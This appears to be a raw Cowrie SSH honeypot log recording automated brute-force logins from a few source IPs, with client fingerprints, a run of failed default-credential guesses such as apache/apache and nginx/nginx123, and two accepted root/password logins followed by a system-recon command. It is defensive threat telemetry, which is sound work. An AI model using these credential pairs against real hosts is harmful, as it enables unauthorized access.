{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:26:31.486888Z","src_ip":"212.227.125.160","session":"98d3762533fa"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink","message":"login attempt [flink/flink] failed","sensor":"my-vps","timestamp":"2025-08-28T05:26:31.889721Z","src_ip":"212.227.125.160","session":"98d3762533fa"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:26:32.997048Z","src_ip":"212.227.125.160","session":"98d3762533fa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50882,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a608b8aba9d","protocol":"ssh","message":"New connection: 212.227.125.160:50882 (1.2.3.4:22) [session: 5a608b8aba9d]","sensor":"my-vps","timestamp":"2025-08-28T05:26:47.151510Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:26:47.152562Z","src_ip":"212.227.125.160","session":"5a608b8aba9d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:26:47.257259Z","src_ip":"212.227.125.160","session":"5a608b8aba9d"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-28T05:26:47.765274Z","src_ip":"212.227.125.160","session":"5a608b8aba9d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:26:49.086534Z","src_ip":"212.227.125.160","session":"5a608b8aba9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55148,"dst_ip":"1.2.3.4","dst_port":22,"session":"0728eb1a34af","protocol":"ssh","message":"New connection: 212.227.235.229:55148 (1.2.3.4:22) [session: 0728eb1a34af]","sensor":"my-vps","timestamp":"2025-08-28T05:26:53.937852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:26:53.938507Z","src_ip":"212.227.235.229","session":"0728eb1a34af"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:26:54.083663Z","src_ip":"212.227.235.229","session":"0728eb1a34af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55394,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cdf9306fb30","protocol":"ssh","message":"New connection: 212.227.235.229:55394 (1.2.3.4:22) [session: 9cdf9306fb30]","sensor":"my-vps","timestamp":"2025-08-28T05:26:54.217124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:26:54.297085Z","src_ip":"212.227.235.229","session":"9cdf9306fb30"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:26:54.361801Z","src_ip":"212.227.235.229","session":"9cdf9306fb30"}
{"eventid":"cowrie.login.failed","username":"flink","password":"flink","message":"login attempt [flink/flink] failed","sensor":"my-vps","timestamp":"2025-08-28T05:26:54.707372Z","src_ip":"212.227.235.229","session":"0728eb1a34af"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-28T05:26:54.934034Z","src_ip":"212.227.235.229","session":"9cdf9306fb30"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:26:55.855685Z","src_ip":"212.227.235.229","session":"0728eb1a34af"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:26:56.078885Z","src_ip":"212.227.235.229","session":"9cdf9306fb30"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50360,"dst_ip":"1.2.3.4","dst_port":22,"session":"a721c5d00c25","protocol":"ssh","message":"New connection: 212.227.125.160:50360 (1.2.3.4:22) [session: a721c5d00c25]","sensor":"my-vps","timestamp":"2025-08-28T05:27:01.603098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:27:01.627713Z","src_ip":"212.227.125.160","session":"a721c5d00c25"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:27:01.713722Z","src_ip":"212.227.125.160","session":"a721c5d00c25"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:27:02.123922Z","src_ip":"212.227.125.160","session":"a721c5d00c25"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:27:02.347694Z","src_ip":"212.227.125.160","session":"a721c5d00c25"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:27:02.348382Z","src_ip":"212.227.125.160","session":"a721c5d00c25"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:02.453482Z","src_ip":"212.227.125.160","session":"a721c5d00c25"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:02.454698Z","src_ip":"212.227.125.160","session":"a721c5d00c25"}
{"eventid":"cowrie.session.connect","src_ip":"184.105.139.70","src_port":6436,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf8172cc792f","protocol":"ssh","message":"New connection: 184.105.139.70:6436 (1.2.3.4:22) [session: bf8172cc792f]","sensor":"my-vps","timestamp":"2025-08-28T05:27:08.445892Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T05:27:08.447124Z","src_ip":"184.105.139.70","session":"bf8172cc792f"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:08.448248Z","src_ip":"184.105.139.70","session":"bf8172cc792f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50738,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb5a1cf55a4a","protocol":"ssh","message":"New connection: 212.227.125.160:50738 (1.2.3.4:22) [session: cb5a1cf55a4a]","sensor":"my-vps","timestamp":"2025-08-28T05:27:16.014848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:27:16.072765Z","src_ip":"212.227.125.160","session":"cb5a1cf55a4a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:16.102406Z","src_ip":"176.65.149.186","session":"e6648deb4155"}
{"eventid":"cowrie.session.closed","duration":180.065123796463,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:16.108471Z","src_ip":"176.65.149.186","session":"e6648deb4155"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:27:16.197975Z","src_ip":"212.227.125.160","session":"cb5a1cf55a4a"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:27:16.584125Z","src_ip":"212.227.125.160","session":"cb5a1cf55a4a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:17.746469Z","src_ip":"212.227.125.160","session":"cb5a1cf55a4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53680,"dst_ip":"1.2.3.4","dst_port":22,"session":"a180748c65a0","protocol":"ssh","message":"New connection: 212.227.235.229:53680 (1.2.3.4:22) [session: a180748c65a0]","sensor":"my-vps","timestamp":"2025-08-28T05:27:23.173333Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:23.282957Z","src_ip":"212.227.235.229","session":"a180748c65a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46636,"dst_ip":"1.2.3.4","dst_port":22,"session":"d75cbd2ccdcd","protocol":"ssh","message":"New connection: 212.227.235.229:46636 (1.2.3.4:22) [session: d75cbd2ccdcd]","sensor":"my-vps","timestamp":"2025-08-28T05:27:23.492126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:27:23.492790Z","src_ip":"212.227.235.229","session":"d75cbd2ccdcd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:27:23.638737Z","src_ip":"212.227.235.229","session":"d75cbd2ccdcd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37160,"dst_ip":"1.2.3.4","dst_port":22,"session":"20c19a2b076c","protocol":"ssh","message":"New connection: 212.227.235.229:37160 (1.2.3.4:22) [session: 20c19a2b076c]","sensor":"my-vps","timestamp":"2025-08-28T05:27:23.887447Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:27:23.888189Z","src_ip":"212.227.235.229","session":"20c19a2b076c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:27:24.031379Z","src_ip":"212.227.235.229","session":"20c19a2b076c"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:27:24.077041Z","src_ip":"212.227.235.229","session":"d75cbd2ccdcd"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:27:24.463342Z","src_ip":"212.227.235.229","session":"20c19a2b076c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:27:24.830431Z","src_ip":"212.227.235.229","session":"20c19a2b076c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:27:24.831157Z","src_ip":"212.227.235.229","session":"20c19a2b076c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:25.034943Z","src_ip":"212.227.235.229","session":"20c19a2b076c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:25.036264Z","src_ip":"212.227.235.229","session":"20c19a2b076c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:27:25.237987Z","src_ip":"212.227.235.229","session":"d75cbd2ccdcd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51582,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d39e480cc7d","protocol":"ssh","message":"New connection: 212.227.125.160:51582 (1.2.3.4:22) [session: 0d39e480cc7d]","sensor":"my-vps","timestamp":"2025-08-28T05:27:31.281979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:27:31.304055Z","src_ip":"212.227.125.160","session":"0d39e480cc7d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh 